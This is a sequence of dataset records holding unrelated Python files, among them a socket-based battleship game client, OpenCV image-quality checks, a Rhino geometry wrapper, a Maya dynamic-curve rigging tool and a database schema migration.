gagné\",fg=\"green\")\n\t\t\t\t\n\t\t\t\tself.interface.joueur.partieELGagnee()\n\t\t\t\tself.interface.message.update()\n\t\t\t\tself.interface.update()\n\t\t\t\tif(self.interface.joueur.pseudo!=\"__localhost__\") :\n\t\t\t\t\t\"\"\"with 
open(\"../localdata/dataJoueur\",\"wb\") as file :\n\t\t\t\t\t\tpickle.dump(self.joueur,file)\n\t\t\t\t\t\tfile.close()\"\"\"\n\t\t\t\t\tpass\n\t\t\telse :\n\t\t\t\tself.interface.message.config(text=\"Vous avez perdu\",fg=\"red\")\n\t\t\t\ttry :\n\t\t\t\t\tself.interface.joueur.partieELPerdue()\n\t\t\t\texcept :\n\t\t\t\t\tpass\n\t\t\t\tif(self.interface.joueur.pseudo!=\"__localhost__\") :\n\t\t\t\t\t\"\"\"with open(\"../localdata/dataJoueur\",\"wb\") as file :\n\t\t\t\t\t\tpickle.dump(self.interface.joueur,file)\n\t\t\t\t\t\tfile.close()\"\"\"\n\t\t\t\t\tpass\n\t\telse :\n\t\t\ttry :\n\t\t\t\tself.partie = self.attenteJeu()\n\t\t\texcept PartieTermineeException :\n\t\t\t\tself.joueur.partieELGagnee()\n\t\t\t\tself.joueur.finPartie()\n\t\t\t\tself.interface.message.config(text=\"Le joueur adverse a abandonné\")\n\t\t\t\tself.interface.partieEnCours = False\n\t\t\texcept PartiePerdueException :\n\t\t\t\tself.interface.partieEnCours = False\n\t\t\t\tself.joueur.finPartie()\n\t\t\t\tself.interface.message.config(text=\"Vous avez perdu\",fg=\"red\")\n\t\t\t\tself.joueur.partieELPerdue()\n\t\t\t\tself.serveur.send(b\"renvoi joueur\")\n\t\t\t\ttime.sleep(0.1)\n\t\t\t\tself.serveur.send(pickle.dumps(self.joueur))\n\t\t\t\ttime.sleep(0.1)\n\t\t\telse :\n\t\t\t\tself.grillePerso.partie = self.partie\n\t\t\t\tfor bouton, val in self.grillePerso.grille.listeCases :\n\t\t\t\t\ty, x = decoder(bouton.getCoord())\n\t\t\t\t\tif(self.partie.joueur1.pseudo == self.joueur.pseudo) :\n\t\t\t\t\t\tif(self.partie.grille1.getValue(x,y)==-1) :\n\t\t\t\t\t\t\tbouton.config(bg = \"grey\")\n\t\t\t\t\t\telif(self.partie.grille1.getValue(x,y)==-2) :\n\t\t\t\t\t\t\tbouton.config(bg = \"red\")\n\t\t\t\t\t\telif(self.partie.grille1.getValue(x,y)==-3) :\n\t\t\t\t\t\t\tbouton.config(bg = \"black\")\n\t\t\t\t\t\telif(self.partie.grille1.getValue(x,y)==1) :\n\t\t\t\t\t\t\tbouton.config(bg = \"green\")\n\t\t\t\t\t\telse :\n\t\t\t\t\t\t\tbouton.config(bg = \"white\")\n\t\t\t\t\telse :\n\t\t\t\t\t\tif(self.partie.grille2.getValue(x,y)==-1) :\n\t\t\t\t\t\t\tbouton.config(bg = \"grey\")\n\t\t\t\t\t\telif(self.partie.grille2.getValue(x,y)==-2) :\n\t\t\t\t\t\t\tbouton.config(bg = \"red\")\n\t\t\t\t\t\telif(self.partie.grille2.getValue(x,y)==-3) :\n\t\t\t\t\t\t\tbouton.config(bg = \"black\")\n\t\t\t\t\t\telif(self.partie.grille2.getValue(x,y)==1) :\n\t\t\t\t\t\t\tbouton.config(bg = \"green\")\n\t\t\t\t\t\telse :\n\t\t\t\t\t\t\tbouton.config(bg = \"white\")\n\t\t\t\tself.grillePerso.update()\n\t\t\t\tself.enableGrille()\n\n\tdef attenteJeu(self) :\n\t\tretour = self.serveur.recv(1024).decode()\n\t\tif(retour==\"partie interrompue\") :\n\t\t\traise PartieTermineeException(\"Le joueur adverse a abandonné\")\n\t\telif(retour == \"perdu\") :\n\t\t\traise PartiePerdueException(\"Vous avez perdu\")\n\t\telse :\n\t\t\tretour = pickle.loads(self.serveur.recv(9999))\n\t\t\treturn(retour)","sub_path":"src/interface_graphique/InterfaceJeu.py","file_name":"InterfaceJeu.py","file_ext":"py","file_size_in_byte":11497,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"37319301","text":"# Detect image sharpness and brightness\n\n# Importing packages\nimport cv2\nimport matplotlib.pyplot as plt\n\n\n# image sharpness recognition\ndef getImageVar(imgPath):\n\n global sharpness\n sharpness = []\n image = cv2.imread(imgPath)\n\n # Convert to grayscale image\n img2gray = cv2.cvtColor(image,cv2.COLOR_BGR2GRAY)\n\n # Laplacian operator - edge detection\n imageVar = 
cv2.Laplacian(img2gray,cv2.CV_64F).var() # var(): Calculate variance\n\n return imageVar\n\n\n# image sharpnesss recognition\ndef getSharpness(imageVar):\n if imageVar <= 50:\n sharpness.append(\"fuzzy\")\n elif imageVar >= 1000:\n sharpness.append(\"sharp\")\n\n return sharpness\n\n\n# image brightness recognition\n# get dark pixels in grayscale image\ndef getBlackPiex(img_path):\n global darkness\n darkness = []\n img = cv2.imread(img_path, 1)\n\n # Convert to grayscale image\n gray_img = cv2.cvtColor(img,cv2.COLOR_BGR2GRAY)\n\n # Get the number of rows and columns of the grayscale matrix\n r,c = gray_img.shape[:2]\n piexs_sum = r*c # total number of pixels\n\n # Get dark pixels in grayscale image\n dark_points = (gray_img < 50) # The artificially setting hyperparameter points that the gray value of 0 ~ 49 is dark\n target_array = gray_img[dark_points]\n dark_sum = target_array.size # the number of dark pixels\n dark_prop = dark_sum / piexs_sum # dark pixels ratio\n\n # Uncomment the line below and show the grayscale histogram\n # hist(img_path)\n\n if dark_prop >= 0.55:\n darkness.append(\"dark\")\n elif dark_prop <= 0.1:\n darkness.append(\"light\")\n\n return darkness\n\n\n# image brightness recognition\n# create the grayscale histogram of image\ndef hist(img_path):\n img = cv2.imread(img_path,1)\n hist = cv2.calcHist([img],[0],None,[256],[0,256])\n plt.plot(hist)\n plt.subplot(121)\n plt.imshow(img,'gray')\n plt.xticks([])\n plt.yticks([])\n plt.title(\"Original\")\n plt.subplot(122)\n plt.hist(img.ravel(),256,[0,256])\n plt.show()","sub_path":"TP_2020/partie4/IngTagging/New_Tags/Quality.py","file_name":"Quality.py","file_ext":"py","file_size_in_byte":2011,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"379147276","text":"from compas.geometry import BrepEdge\nfrom compas.geometry import Line\nfrom compas.geometry import Point\nfrom compas.geometry import Circle\nfrom compas_rhino.geometry import RhinoNurbsCurve\nfrom compas_rhino.conversions import curve_to_compas_line\nfrom compas_rhino.conversions import curve_to_compas_circle\nfrom compas_rhino.conversions import line_to_rhino_curve\nfrom compas_rhino.conversions import circle_to_rhino_curve\n\nfrom .vertex import RhinoBrepVertex\n\n\nclass RhinoBrepEdge(BrepEdge):\n \"\"\"A wrapper for Rhino.Geometry.BrepEdge\n\n Attributes\n ----------\n curve : :class:`Rhino.Geometry.Curve3D`\n The underlying geometry of this edge.\n start_vertex : :class:`~compas_rhino.geometry.RhinoBrepVertex`, read-only\n The start vertex of this edge.\n end_vertex : :class:`~compas_rhino.geometry.RhinoBrepVertex`, read-only\n The end vertex of this edge.\n vertices : list[:class:`~compas_rhino.geometry.RhinoBrepVertex`], read-only\n The list of vertices which comprise this edge (start and end)\n is_circle : bool, read-only\n True if the geometry of this edge is a circle, False otherwise.\n is_line : bool, read-only\n True if the geometry of this edge is a line, False otherwise.\n\n \"\"\"\n\n def __init__(self, rhino_edge=None):\n super(RhinoBrepEdge, self).__init__()\n self._edge = None\n self._curve = None\n self._start_vertex = None\n self._end_vertex = None\n if rhino_edge:\n self._set_edge(rhino_edge)\n\n def _set_edge(self, native_edge):\n self._edge = native_edge\n self._curve = self._edge.EdgeCurve\n self._start_vertex = RhinoBrepVertex(self._edge.StartVertex)\n self._end_vertex = RhinoBrepVertex(self._edge.EndVertex)\n\n # 
==============================================================================\n # Data\n # ==============================================================================\n\n @property\n def data(self):\n if self.is_line:\n type_ = \"line\"\n curve = curve_to_compas_line(self._curve)\n elif self.is_circle:\n type_ = \"circle\"\n curve = curve_to_compas_circle(self._curve)\n else:\n type_ = \"nurbs\"\n curve = RhinoNurbsCurve.from_rhino(self._curve)\n return {\n \"type\": type_,\n \"value\": curve.data,\n \"points\": [self._start_vertex.point.data, self._end_vertex.point.data],\n }\n\n @data.setter\n def data(self, value):\n curve_type = value[\"type\"]\n if curve_type == \"line\":\n self._curve = line_to_rhino_curve(\n Line.from_data(value[\"value\"])\n ) # this returns a Nurbs Curve, why?\n elif curve_type == \"circle\":\n self._curve = circle_to_rhino_curve(\n Circle.from_data(value[\"value\"])\n ) # this returns a Nurbs Curve, why?\n else:\n self._curve = RhinoNurbsCurve.from_data(value[\"value\"]).rhino_curve\n # TODO: can a single edge be defined with more than start and end vertices?\n self._start_vertex, self._end_vertex = RhinoBrepVertex(), RhinoBrepVertex()\n self._start_vertex._point = Point.from_data(value[\"points\"][0])\n self._end_vertex._point = Point.from_data(value[\"points\"][1])\n\n # ==============================================================================\n # Properties\n # ==============================================================================\n\n @property\n def curve(self):\n return self._curve\n\n @property\n def start_vertex(self):\n return self._start_vertex\n\n @property\n def end_vertex(self):\n return self._end_vertex\n\n @property\n def vertices(self):\n return [self._start_vertex, self._end_vertex]\n\n @property\n def is_circle(self):\n return self._curve.IsCircle()\n\n @property\n def is_line(self):\n return self._curve.IsLinear()\n","sub_path":"src/compas_rhino/geometry/brep/edge.py","file_name":"edge.py","file_ext":"py","file_size_in_byte":3974,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"584561412","text":"import sys\nfrom SheetsUpdater import *\nfrom PyQt5.QtWidgets import (QWidget, QPushButton, QLineEdit, QVBoxLayout, QHBoxLayout, QInputDialog, QApplication, QLabel, QGridLayout, QCheckBox, QListWidget)\nfrom PyQt5.QtGui import QPainter, QColor, QFont\nfrom PyQt5.QtCore import Qt\n\nclass GroupResults(QWidget):\n \n def __init__(self, SessID, grouplist):\n super().__init__()\n self.initUI(SessID, grouplist)\n\n def initUI(self, SessID, grouplist):\n self.SessID = SessID\n self.grouplist = grouplist\n self.groupName = self.grouplist.pop()\n titleStr = 'Enter information for ' + self.groupName\n self.titleLabel = QLabel(titleStr)\n\n self.realVolsLabel = QLabel('Enter Number of Actual Volunteers:')\n self.realVols = QLineEdit(self)\n self.realVolsBox = QVBoxLayout()\n self.realVolsBox.addWidget(self.realVolsLabel)\n self.realVolsBox.addWidget(self.realVols)\n\n self.hrsWorkedLabel = QLabel('Enter Hours Worked:')\n self.hrsWorked = QLineEdit(self) \n self.hrsWorkedBox = QVBoxLayout()\n self.hrsWorkedBox.addWidget(self.hrsWorkedLabel)\n self.hrsWorkedBox.addWidget(self.hrsWorked)\n\n self.NextGroupButton = QPushButton('Next Group')\n self.NextGroupButton.clicked.connect(self.enterNextGroup)\n\n self.GroupBox = QVBoxLayout()\n self.GroupBox.addWidget(self.titleLabel)\n self.GroupBox.addLayout(self.realVolsBox)\n self.GroupBox.addLayout(self.hrsWorkedBox)\n 
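# assemble the dialog top to bottom: title, volunteer count, hours worked, then the navigation button\n        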
self.GroupBox.addWidget(self.NextGroupButton)\n\n self.setLayout(self.GroupBox)\n self.setGeometry(300, 300, 300, 300)\n self.setWindowTitle('Enter Group Turnout')\n self.show()\n\n def enterNextGroup(self):\n addGroupResults(self.SessID, self.groupName, self.realVols.text(), self.hrsWorked.text())\n updateGroupVolStats(self.groupName, self.hrsWorked.text(), self.realVols.text())\n if self.grouplist == []:\n self.close()\n else:\n self.NextGroupWindow = GroupResults(self.SessID, self.grouplist)\n self.NextGroupWindow.show()\n self.close()\n \n\n","sub_path":"GroupResults.py","file_name":"GroupResults.py","file_ext":"py","file_size_in_byte":2174,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"49"} +{"seq_id":"198872690","text":"def init(list):\n list = []\n\n\ndef lookup(list):\n for i in list:\n print(\"%s/%s/%s\" % (i['year'], i['month'], i['day']))\n\ndef store(list):\n a = {}\n a['year'], a['month'], a['day'] = input('请输入年月日(yy/mm/dd)').split('/')\n list.append(a)\n\nprompt = '''\n1.Init\n2.Lookup\n3.Store\n输入quit结束程序!\n'''\nlist = []\nmessage = ''\nwhile message != 'quit':\n message = input(prompt)\n if message == '1':\n init(list)\n elif message == '2':\n lookup(list)\n elif message == '3':\n store(list)\n\n","sub_path":"exp3/exp3_3.py","file_name":"exp3_3.py","file_ext":"py","file_size_in_byte":548,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"49"} +{"seq_id":"329655516","text":"\"\"\"\nCylindrical equidistant\n=======================\n\n``Qwidth``: Give the figure ``width``.\n\"\"\"\nimport pygmt\n\nfig = pygmt.Figure()\n# Use region \"d\" to specify global region (-180/180/-90/90)\nfig.coast(\n region=\"d\",\n projection=\"Q12c\",\n land=\"tan4\",\n water=\"lightcyan\",\n frame=\"afg\",\n)\nfig.show()\n","sub_path":"examples/projections/cyl/cyl_equidistant.py","file_name":"cyl_equidistant.py","file_ext":"py","file_size_in_byte":311,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"49"} +{"seq_id":"255720464","text":"#----------------------------------------------#\n# coding: utf-8\n#Author: rosa.w\n#Mail: wrx1844@qq.com\n#Computer language: Python.3.2.2\n#scriptName : rosa_PublicClass.py\n#Note: this is my global class\n# add in git 2014/04/02\n#----------------------------------------------#\n\n\nimport maya.cmds as mc\nimport sys\nimport maya.mel as mel\n#scriptPath = mc.internalVar(userScriptDir=True)\n#addPath = scriptPath[ : ( len(scriptPath)-1 ) ]\n#sys.path.append(addPath)\n\n\nclass DynCrv():\n\n\n def dynamicToolWin(self):\n\n dynamicToolWindow = 'RoolWin'\n if mc.window(dynamicToolWindow,ex = True):\n mc.deleteUI(dynamicToolWindow)\n\n mc.window(dynamicToolWindow,widthHeight=(300, 100),t='Dyn Curve v1.0',menuBar = True,rtf=True,s=True)\n frame1 = mc.frameLayout( label='Dynamic Curve', labelAlign='top', borderStyle='in' )\n mc.rowColumnLayout('Main',numberOfColumns=1,w=300,cal = (5,'center'),m=True)\n\n mc.rowColumnLayout('dynamicCv_ly',numberOfColumns=2,w=300,cal = (5,'center'),m=True)\n mc.textField('dynamicCurve_TF',w=150)\n mc.button(l='load Dynamic Ctrl',w=150,c=lambda *args:self.loadCtrl())\n mc.setParent('..')\n mc.button('dynamic Curve',w=300,h=30,c=lambda *args:self.DynamicAddCurve())\n\n mc.showWindow()\n\n def loadCtrl(self):\n objsel=mc.ls(sl=True)[0]\n dynCtrl = mc.textField('dynamicCurve_TF',e=True,tx=objsel)\n\n\n def DynamicAddCurve(self):\n dynCtrl=mc.textField('dynamicCurve_TF',q=True,tx=True)\n curveAll=mc.ls(sl=True)\n for i in 
curveAll:\n mc.select(i)\n dynamicCurve=str(i)+'_dynamic_curve'\n dynamicFollicle=str(i)+'_dynamic_follicle'\n\n\n mel.eval('makeCurvesDynamicHairs 1 0 1')\n ### rename\n follicle=mc.listRelatives(i,p=True)[0]\n mc.rename(follicle,dynamicFollicle)\n\n\n follicleGrpOrg=mc.listRelatives(dynamicFollicle,p=True)[0]\n follicleGrp=str(i)+'_'+str(follicleGrpOrg)\n mc.rename(follicleGrpOrg,follicleGrp)\n\n follicleShape=mc.listRelatives(dynamicFollicle,s=True)[0]\n dynamicCurveOrg=mc.listConnections(follicleShape+'.outCurve',d=True)[0]\n mc.rename(dynamicCurveOrg,dynamicCurve)\n\n outCurveGrpOrg=mc.listRelatives(dynamicCurve,p=True)[0]\n outCurveGrp=str(i)+'_'+str(outCurveGrpOrg)\n mc.rename(outCurveGrpOrg,outCurveGrp)\n\n ######\n hairSysOrg=mc.listConnections(str(follicleShape)+'.outHair',s=True)[0]\n hairSys=str(i)+'_hairSystem'\n mc.rename(hairSysOrg,hairSys)\n hairSysShape=mc.listRelatives(hairSys,s=True)[0]\n\n\n dynfolliShape=mc.listRelatives(dynamicFollicle,s=True)[0]\n mc.setAttr(str(dynfolliShape)+'.pointLock',1)\n\n if mc.attributeQuery('dynamic',node=dynCtrl,ex=True)==False:\n mc.addAttr(dynCtrl,longName='dynamic',at =\"enum\",en =\"off:on:\",k=True)\n else:\n pass\n if mc.attributeQuery('Swing_strength_Driven',node=dynCtrl,ex=True)==False:\n mc.addAttr(dynCtrl,longName='Swing_strength_Driven',at='float',min=0,max=1)\n else:\n pass\n\n if mc.attributeQuery('Swing_strength',node=dynCtrl,ex=True)==False:\n mc.addAttr(dynCtrl,longName='Swing_strength',at='float',min=0,max=1,dv=0.8)\n else:\n pass\n if mc.attributeQuery('dynamic_baseVaule',node=dynCtrl,ex=True)==False:\n mc.addAttr(dynCtrl,longName='dynamic_baseVaule',at='float',min=-1,max=1)\n else:\n pass\n if mc.attributeQuery('start_frame',node=dynCtrl,ex=True)==False:\n mc.addAttr(dynCtrl,longName='start_frame',at='float',dv=1)\n else:\n pass\n\n\n mc.setAttr(str(dynCtrl)+'.dynamic',k=True)\n mc.setAttr(str(dynCtrl)+'.Swing_strength_Driven',k=True)\n mc.setAttr(str(dynCtrl)+'.Swing_strength',k=True)\n mc.setAttr(str(dynCtrl)+'.dynamic_baseVaule',k=True)\n mc.setAttr(str(dynCtrl)+'.start_frame',k=True)\n mc.setDrivenKeyframe(str(hairSysShape)+'.simulationMethod', cd=str(dynCtrl)+'.dynamic',dv=0,v=1)\n mc.setDrivenKeyframe(str(hairSysShape)+'.simulationMethod', cd=str(dynCtrl)+'.dynamic',dv=1,v=3)\n ## tomorrow connect attribute\n mc.setAttr(str(follicleShape)+'.overrideDynamics',1)\n mc.setAttr(str(follicleShape)+'.stiffnessScale[1].stiffnessScale_FloatValue',1)\n mc.connectAttr(str(dynCtrl)+'.Swing_strength_Driven',str(follicleShape)+'.stiffness')\n mc.connectAttr(str(dynCtrl)+'.Swing_strength_Driven',str(follicleShape)+'.startCurveAttract')\n\n mc.setDrivenKeyframe(str(dynCtrl)+'.Swing_strength_Driven', cd=str(dynCtrl)+'.Swing_strength',dv=0,v=0.1,ott='linear',itt='linear')\n mc.setDrivenKeyframe(str(dynCtrl)+'.Swing_strength_Driven', cd=str(dynCtrl)+'.Swing_strength',dv=1,v=1,ott='linear',itt='linear')\n ####\n conNode=str(i)+'_condition'\n pma01=str(i)+'_01_PMA'\n pma02=str(i)+'_02_PMA'\n mc.createNode('condition',n=conNode)\n mc.createNode('plusMinusAverage',n=pma01)\n mc.createNode('plusMinusAverage',n=pma02)\n\n mc.connectAttr(str(dynCtrl)+'.Swing_strength_Driven',str(conNode)+'.firstTerm')\n mc.connectAttr(str(dynCtrl)+'.Swing_strength_Driven',str(conNode)+'.colorIfTrueR')\n mc.setAttr(str(conNode)+'.operation',2)\n mc.setAttr(str(conNode)+'.secondTerm',0.8)\n mc.setAttr(str(conNode)+'.colorIfFalseR',0.8)\n\n mc.connectAttr(str(conNode)+'.outColorR',str(pma01)+'.input2D[0].input2Dx')\n 
mc.setAttr(str(pma01)+'.input2D[1].input2Dx',0.8)\n            mc.setAttr(str(pma01)+'.operation',2)\n\n            mc.connectAttr(str(pma01)+'.output2Dx',str(pma02)+'.input2D[0].input2Dx')\n            mc.connectAttr(str(dynCtrl)+'.dynamic_baseVaule',str(pma02)+'.input2D[1].input2Dx')\n            mc.setAttr(str(pma02)+'.operation',1)\n\n            mc.connectAttr(str(pma02)+'.output2Dx',str(follicleShape)+'.attractionScale[1].attractionScale_FloatValue')\n            mc.setDrivenKeyframe(str(dynCtrl)+'.dynamic_baseVaule', cd=str(dynCtrl)+'.Swing_strength_Driven',dv=0.8,v=0.2,ott='linear',itt='linear')\n            mc.setDrivenKeyframe(str(dynCtrl)+'.dynamic_baseVaule', cd=str(dynCtrl)+'.Swing_strength_Driven',dv=1,v=0.8,ott='linear',itt='linear')\n\n            mc.connectAttr(str(dynCtrl)+'.start_frame',str(hairSysShape)+'.startFrame')\n\n            mc.setAttr(str(dynCtrl)+'.dynamic_baseVaule',k=False)\n            mc.setAttr(str(dynCtrl)+'.Swing_strength_Driven',k=False)\n            print(hairSys)\n            print(follicleGrp)\n            print(outCurveGrp)\n\n            grpAll=str(i)+'_dynamic_grp'\n            mc.group(follicleGrp,outCurveGrp,hairSys,n=grpAll)\n\n\n","sub_path":"rosa_Checker/RosaCmds/Tools/rosa_DynamicTool.py","file_name":"rosa_DynamicTool.py","file_ext":"py","file_size_in_byte":6970,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"131580502","text":"\"\"\"Additional functions used within the CARSpy program.\"\"\"\nfrom functools import wraps\nimport pickle\nimport numpy as np\n\ntry:\n    import cantera as ct\n    _HAS_CANTERA = True\nexcept Exception:\n    _HAS_CANTERA = False\n\n\ndef _ensureCantera(function):\n    if _HAS_CANTERA:\n        @wraps(function)\n        def wrapper(*args, **kwargs):\n            return function(*args, **kwargs)\n        wrapper.__doc__ = function.__doc__\n        return wrapper\n\n    def no_op(*args, **kwargs):\n        _message = (\"cantera module is required for calculating equilibrium \"\n                    \"composition. Please install cantera first or specify \"\n                    \"custom eq_func in signal_as() instead.\")\n        raise Exception(_message)\n    no_op.__doc__ = function.__doc__\n    return no_op\n\n\n@_ensureCantera\ndef eq_comp(temperature, pressure, init_comp, valid_from=1200.):\n    \"\"\"\n    Calculate equilibrium composition at given temperature and pressure.\n\n    .. attention::\n        This function is only intended as a \"dummy\" template for setting up\n        custom equilibrium solvers with ``cantera``. Please be aware of the\n        applicabilities and uncertainties of various kinetic mechanisms.\n\n    Parameters\n    ----------\n    temperature : float\n        Temperature in [K].\n    pressure : float, optional\n        Pressure in bars, by default 1.\n    init_comp : dict\n        Initial gas mole fractions in a dictionary.\n    valid_from : float\n        Temperature lower boundary for when the mechanism is valid, default is\n        1200 [K]. 
This value is by no means valid for all cases.\n    \"\"\"\n    products = init_comp.copy()\n    if temperature > valid_from:\n        gas = ct.Solution('gri30.xml')\n        gas.TPX = temperature, pressure*1e5, init_comp\n        gas.equilibrate('TP')\n        products = gas.mole_fraction_dict()\n\n    # remove small values\n    products = {key: products[key] for key in products if products[key] > 1e-5}\n\n    return products\n\n\ndef downsample(w, w_fine, spec_fine, mode='local_mean'):\n    \"\"\"Downsample a fine spectrum according to specified coarse spectral axis.\n\n    Parameters\n    ----------\n    w : sorted 1-D array of floats\n        Coarse spectral axis (must be sorted and evenly spaced).\n    w_fine : sorted 1-D array of floats\n        Fine spectral axis (must be sorted and evenly spaced).\n    spec_fine : 1-D array of floats\n        Spectrum with fine resolution, must be of the same size as w_fine.\n    mode : str, optional\n        Two modes to choose from: 'local-mean' or 'interp', by default\n        'local_mean'.\n\n    Returns\n    -------\n    1-D array of floats\n        Downsampled spectrum of the same size as w.\n    \"\"\"\n    downsampled = []\n    if mode == 'interp':\n        downsampled = np.interp(w, w_fine, spec_fine)\n    elif mode == 'local_mean':\n        # downsample scale\n        hw = int((w[1] - w[0])/(w_fine[1] - w_fine[0])/2)\n        # search for closest indices\n        w_fine = np.array(w_fine)\n        idx = np.searchsorted(w_fine, w)\n        idx[w_fine[idx] - w > np.diff(w_fine).mean()*0.5] -= 1\n        # take local average based on the downsample scale\n        downsampled = np.mean(\n            [spec_fine[idx-_step] for _step in range(-hw, hw+1)], axis=0)\n\n    return downsampled\n\n\ndef comp_normalize(comp_dict, target=1.0):\n    \"\"\"Normalize gas composition saved in a dictionary.\n\n    Parameters\n    ----------\n    comp_dict : dict\n        Gas composition in the measurement volume stored in a dictionary.\n    target : float, optional\n        Normalization factor, by default 1.0.\n\n    Returns\n    -------\n    dict\n        Normalized gas composition stored in a dictionary.\n    \"\"\"\n    raw = sum(comp_dict.values())\n    factor = target/raw\n    return {key: value*factor for key, value in comp_dict.items()}\n\n\ndef pkl_dump(path_write, data):\n    \"\"\"Dump data into a pickle file.\n\n    Parameters\n    ----------\n    path_write : path\n        Absolute path to the pickle file to be created.\n    data: python object\n        Data to be pickled.\n    \"\"\"\n    with open(path_write, 'wb') as pf:\n        pickle.dump(data, pf)\n\n\ndef pkl_load(path_load):\n    \"\"\"Load data from a pickle file.\n\n    Parameters\n    ----------\n    path_load : path\n        Absolute path to the pickle file to be loaded.\n    \"\"\"\n    with open(path_load, 'rb') as pf:\n        data = pickle.load(pf)\n\n    return data\n","sub_path":"carspy/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":4304,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"400316821","text":"#!/usr/bin/python\nimport os, sys\nimport errno\nfrom shutil import copyfile\nimport numpy as np\nimport math # for use of math.pi\n\n### Define a modified folder \n### creator which doesn't throw an error if the folder already exists.\n### uses errno and os\n### https://stackoverflow.com/questions/600268/mkdir-p-functionality-in-python \ndef mkdir_p(path):\n    try:\n        os.makedirs(path)\n    except OSError as exc:  # Python >2.5\n        if exc.errno == errno.EEXIST and os.path.isdir(path):\n            pass\n        else:\n            raise\n\ndef main():\n\tn_cases=20\n\tcase_folder_names=[]\n\tcase_file_names=[]\n\tfor case in range(1, 
n_cases+1):\n\t\tcase_folder_name=\"case_\"+str(case)\n\t\tcase_folder_names=case_folder_names+[case_folder_name]\n\t\tcase_file_name='hm50_finite_case_'+str(case)\n\t\tcase_file_names=case_file_names+[case_file_name]\n\tprint(case_folder_names)\n\tprint(case_file_names)\n\n\t#Define the location of the original files\n\told_files_location='/global/scratch/lpgregg/burnup_safety/michael_rerun'\n\n\t#Define the location for the perturbed temperature files\n\tnew_files_location='/global/scratch/lpgregg/burnup_safety/michael_rerun_results'\n\n\t#copy over all the input files.\n\tresults_filename=\"hm50_finite_input_res.m\"\n\tdepletion_filename=\"hm50_finite_input_dep.m\"\n\n\tfor i in range(0,len(case_folder_names)):\n\t\tmkdir_p(new_files_location)\n\t\tmkdir_p(new_files_location+\"/\"+case_folder_names[i])\n\t\tcase_folder_names[i]\n\t\t\n\t\told_file_path=old_files_location+\"/\"+case_folder_names[i]+\"/\"+results_filename\n\t\tnew_file_path=new_files_location+\"/\"+case_folder_names[i]+\"/\"+results_filename\n\t\tprint(old_file_path)\n\t\tprint(new_file_path)\n\n\t\tcopyfile(old_file_path,\n\t\t\tnew_file_path)\n\n\t\told_file_path=old_files_location+\"/\"+case_folder_names[i]+\"/\"+depletion_filename\n\t\tnew_file_path=new_files_location+\"/\"+case_folder_names[i]+\"/\"+depletion_filename\n\t\tprint(old_file_path)\n\t\tprint(new_file_path)\n\n\t\tcopyfile(old_file_path,\n\t\t\tnew_file_path)\t\t\n\n\nmain()\n","sub_path":"move_michael_results.py","file_name":"move_michael_results.py","file_ext":"py","file_size_in_byte":1943,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"38959289","text":"# 61. Searching the KVS\n# Using the database built in exercise 60, retrieve the location of activity of a specific (given) artist.\n\n\"\"\"\nThis can be verified by simply connecting to redis from the command line:\n\n127.0.0.1:6379> get \"Al Street\"\n\"United States\"\n\nBut the task presumably means \"do it in Python\", so here it is in Python.\n\"\"\"\n\nimport redis\n\nif __name__ == '__main__':\n    my_redis = redis.Redis(host='localhost', port=6379, db=0)\n\n    if my_redis.get(\"Al Street\"):\n        print(my_redis.get(\"Al Street\").decode(\"utf-8\"))\n\n\"\"\"\nOutput\n\nWithout decode:\nb'United States'\n\nWith decode:\nUnited States\n\"\"\"","sub_path":"60-69/knock_61.py","file_name":"knock_61.py","file_ext":"py","file_size_in_byte":651,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"21216562","text":"from opengever.core.upgrade import SchemaMigration\nfrom sqlalchemy import String\n\n\nclass IncreaseOGDSColumnLengths(SchemaMigration):\n    \"\"\"Increase lengths for several VARCHAR columns in OGDS in preparation\n    for factoring out common column lengths to constants.\n\n    (Upgrade-step for corresponding change in opengever.ogds.models)\n    \"\"\"\n\n    profileid = 'opengever.ogds.base'\n    upgradeid = 4301\n\n    def migrate(self):\n        self.increase_admin_unit_title_length()\n        self.increase_org_unit_title_length()\n\n        self.increase_user_firstname_length()\n        self.increase_user_lastname_length()\n\n        self.increase_user_directorate_length()\n        self.increase_user_directorate_abbr_length()\n        self.increase_user_department_length()\n        self.increase_user_department_abbr_length()\n\n        self.increase_user_email_length()\n        self.increase_user_email2_length()\n\n    def increase_admin_unit_title_length(self):\n        # Match UNIT_TITLE_LENGTH\n        self.op.alter_column('admin_units',\n                             'title',\n                             type_=String(255),\n                             existing_nullable=True,\n                             existing_type=String(30))\n\n    def increase_org_unit_title_length(self):\n        # Match UNIT_TITLE_LENGTH\n        self.op.alter_column('org_units',\n                             'title',\n                             
type_=String(255),\n existing_nullable=True,\n existing_type=String(30))\n\n def increase_user_firstname_length(self):\n # Match FIRSTNAME_LENGTH\n self.op.alter_column('users',\n 'firstname',\n type_=String(255),\n existing_nullable=True,\n existing_type=String(50))\n\n def increase_user_lastname_length(self):\n # Match LASTNAME_LENGTH\n self.op.alter_column('users',\n 'lastname',\n type_=String(255),\n existing_nullable=True,\n existing_type=String(50))\n\n def increase_user_directorate_length(self):\n self.op.alter_column('users',\n 'directorate',\n type_=String(255),\n existing_nullable=True,\n existing_type=String(50))\n\n def increase_user_directorate_abbr_length(self):\n self.op.alter_column('users',\n 'directorate_abbr',\n type_=String(50),\n existing_nullable=True,\n existing_type=String(10))\n\n def increase_user_department_length(self):\n self.op.alter_column('users',\n 'department',\n type_=String(255),\n existing_nullable=True,\n existing_type=String(50))\n\n def increase_user_department_abbr_length(self):\n self.op.alter_column('users',\n 'department_abbr',\n type_=String(50),\n existing_nullable=True,\n existing_type=String(10))\n\n def increase_user_email_length(self):\n # Match EMAIL_LENGTH\n self.op.alter_column('users',\n 'email',\n type_=String(255),\n existing_nullable=True,\n 